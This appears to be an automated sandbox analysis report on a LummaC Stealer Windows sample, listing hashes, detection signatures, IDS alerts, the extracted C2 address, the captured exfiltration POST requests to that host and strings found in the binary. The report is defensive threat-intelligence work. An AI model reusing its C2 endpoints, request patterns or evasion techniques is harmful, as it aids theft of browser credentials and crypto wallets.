
Windows Analysis Report
WyPb2uVZ1P.exe

Overview

General Information

Sample name: WyPb2uVZ1P.exe (renamed because the original name is a hash value)
Original sample name: a0b8c563061f45f6f5b7573d57c3b0c6.exe
Analysis ID: 1618759
MD5: a0b8c563061f45f6f5b7573d57c3b0c6
SHA1: 1d5e10368656a4176b7c5ceb98062652eea79832
SHA256: e0b300c8470d1e78d5e17617983506311c2adee7fd2326c32b904d2fb1d4e80c
Tags: exe, user-abuse_ch

Detection

LummaC Stealer
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found string related to ransomware
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • WyPb2uVZ1P.exe (PID: 984 cmdline: "C:\Users\user\Desktop\WyPb2uVZ1P.exe" MD5: A0B8C563061F45F6F5B7573D57C3B0C6)
    • RegAsm.exe (PID: 2956 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 2796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
{"C2 url": "https://hitreasurxes.tech:443/api", "Build Version": "WG6I6S--web1"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000002.2370106119.0000000006A40000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000003.00000002.2573265083.0000000000610000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x55708: $x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x58c3e: $x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x129f08: $x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x12d43e: $x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x2995c0: $x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x29cb56: $x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Source | Rule | Description | Author | Strings
0.2.WyPb2uVZ1P.exe.558b478.6.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.WyPb2uVZ1P.exe.6a40000.17.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.WyPb2uVZ1P.exe.6a40000.17.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.WyPb2uVZ1P.exe.558b478.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.WyPb2uVZ1P.exe.4f91c2c.3.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T07:18:43.196200+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49799 | 149.154.167.99 | 443 | TCP
2025-02-19T07:18:44.031990+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49805 | 104.21.16.1 | 443 | TCP
2025-02-19T07:18:44.903701+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49812 | 104.21.16.1 | 443 | TCP
2025-02-19T07:18:46.077108+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49820 | 104.21.16.1 | 443 | TCP
2025-02-19T07:18:47.176639+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49825 | 104.21.16.1 | 443 | TCP
2025-02-19T07:18:59.535097+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49907 | 104.21.16.1 | 443 | TCP
2025-02-19T07:19:00.695460+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49915 | 104.21.16.1 | 443 | TCP
2025-02-19T07:19:01.921708+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49926 | 104.21.16.1 | 443 | TCP
2025-02-19T07:19:04.121367+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49939 | 104.21.16.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T07:18:44.439810+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49805 | 104.21.16.1 | 443 | TCP
2025-02-19T07:18:45.398889+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49812 | 104.21.16.1 | 443 | TCP
2025-02-19T07:19:04.605214+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49939 | 104.21.16.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T07:18:44.439810+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49805 | 104.21.16.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T07:18:58.992014+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49825 | 104.21.16.1 | 443 | TCP


                    AV Detection

Source: RegAsm.exe.2956.3.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": "https://hitreasurxes.tech:443/api", "Build Version": "WG6I6S--web1"}
Source: WyPb2uVZ1P.exe | ReversingLabs: Detection: 56%
Source: WyPb2uVZ1P.exe | Virustotal: Detection: 45%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A92A60 _memcpy_s,CryptImportKey,CryptSetKeyParam,0_2_00A92A60
Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A92B10 CryptAcquireContextW,CryptAcquireContextW,0_2_00A92B10
Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A92FE0 CryptDestroyKey,CryptReleaseContext,0_2_00A92FE0
Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A92F70 CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00A92F70
Source: WyPb2uVZ1P.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: WyPb2uVZ1P.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49907 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49926 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49939 version: TLS 1.2
Source: WyPb2uVZ1P.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: E:\Adlice\UpdateChecker\RelWithDebInfo\updater.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: 2C:\VisualStudio\Projects\RebootExec\Release\RebootExec.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2370757567.0000000006CA0000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004C28000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: WyPb2uVZ1P.exe
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2370757567.0000000006CA0000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004C28000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\VisualStudio\Projects\RebootExec\Release\RebootExec.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00ABEB70 PathFileExistsW,FreeLibrary,FreeLibrary,PathFileExistsW,FreeLibrary,FreeLibrary,PathFileExistsW,FindFirstFileW,FindClose,CopyFileW,GetTempPathW,PathFileExistsW,GetSystemDirectoryW,SHDefExtractIconW,GdipCreateBitmapFromHBITMAP,GdipSaveImageToFile,GdipDisposeImage,0_2_00ABEB70
Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A91560 FindFirstFileW,0_2_00A91560
Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00A91770 FindClose,FindFirstFileW,0_2_00A91770

                    Networking

Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49825 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49805 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49805 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49812 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49939 -> 104.21.16.1:443
Source: Malware configuration extractor | URLs: https://hitreasurxes.tech:443/api
Source: Joe Sandbox View | IP Address: 104.21.16.1
Source: Joe Sandbox View | IP Address: 149.154.167.99
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49812 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49825 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49805 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49799 -> 149.154.167.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49915 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49926 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49939 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49820 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49907 -> 104.21.16.1:443
Source: global traffic | HTTP traffic detected:
  GET /asdasdasgdsg HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Host: t.me
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: hitreasurxes.tech
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 47
  Host: hitreasurxes.tech
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=KFL1AIUZ2E
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 12788
  Host: hitreasurxes.tech
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=9VS81VD2X9WHKITGW
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 15072
  Host: hitreasurxes.tech
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=YB7FVY6PKE38QE
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 20544
  Host: hitreasurxes.tech
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=9AIZX97H9HZCPZ6
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 2276
  Host: hitreasurxes.tech
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=XPX2NDCI5X29Z3BAAR
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 590613
  Host: hitreasurxes.tech
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 81
  Host: hitreasurxes.tech
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
  GET /asdasdasgdsg HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Host: t.me
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: global traffic | DNS traffic detected: DNS query: hitreasurxes.tech
Source: unknown | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: hitreasurxes.tech
Source: WyPb2uVZ1P.exe, 00000000.00000002.2368590089.0000000006380000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: WyPb2uVZ1P.exe, WyPb2uVZ1P.exe, 00000000.00000002.2368590089.0000000006380000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVE36.crl0
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootE46.crl0
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVE36.crt0#
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootE46.p7c0#
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: WyPb2uVZ1P.exe, WyPb2uVZ1P.exe, 00000000.00000002.2368590089.0000000006380000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2352844711.0000000003100000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://ocsp.sectigo.com0E
Source: WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://www.carifred.com/
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://www.carifred.com/4.7.0.0http://www.carifred.com/mrs/about.php?ver=http://www.carifred.com/mrs
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://www.carifred.com/http://www.carifred.com/donate/?p=Account_Profile_Fixer4.7.0.0http://www.car
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://www.carifred.com/mrs/
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://www.carifred.com/mrs/about.php?ver=
Source: WyPb2uVZ1P.exe | String found in binary or memory: http://www.carifred.com/stop_resetting_my_apps/about.php?ver=http://www.carifred.com/stop_resetting_
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://adflux.adlice.com
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://adlice.com/threat
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://cloudsigs.adlice.com/hashfilenamefilepathfilesizescoreneeds_analysismaliciousshould_upload
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://download.adlice.com/api/?action=read&app=%ls&type=available_version
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://download.adlice.com/api?action=download&app=%ls&type=setuphttps://download.adlice.com/api?ac
Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hitreasurxes.tech/
Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hitreasurxes.tech/-
Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hitreasurxes.tech/47
Source: RegAsm.exe, 00000003.00000002.2573588665.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hitreasurxes.tech/M
Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2573778673.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2573778673.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hitreasurxes.tech/api
Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000B08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hitreasurxes.tech/apiC
Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hitreasurxes.tech/apiG
Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000B08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hitreasurxes.tech/apis
Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hitreasurxes.tech/w
Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hitreasurxes.tech/wn
Source: RegAsm.exe, 00000003.00000002.2573778673.0000000000A77000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hitreasurxes.tech:443/api
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://sectigo.com/CPS0
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://sigs.adlice.comOrBDrgi0iSxGIRU37F3q
Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://stats.adlice.comROGUEKILLER_TECHUCHECK_TECHDIAG_TECHDIFFVIEW
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://status.adlice.com/api.php?action=config&token=FxdaJ5JabbPwT7aSWhXgenforcesilentcommunitysend
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://status.adlice.com/api.php?action=ping&token=FxdaJ5JabbPwT7aSWhXg
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://www.carifred.com/uvk/cloudsync.php?u=Mozilla/5.0
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://www.carifred.com/uvk/cloudsyncput.php?u=fred(go);Content-Type:
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://www.carifred.com/uvk/md5_vreports/index.php?md5=https://www.google.comMozilla/5.0
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://www.google.com/search
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://www.google.com/search?q=
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://www.virustotal.com...
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://www.virustotal.com/
Source: WyPb2uVZ1P.exe | String found in binary or memory: https://www.virustotal.com/gui/file/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
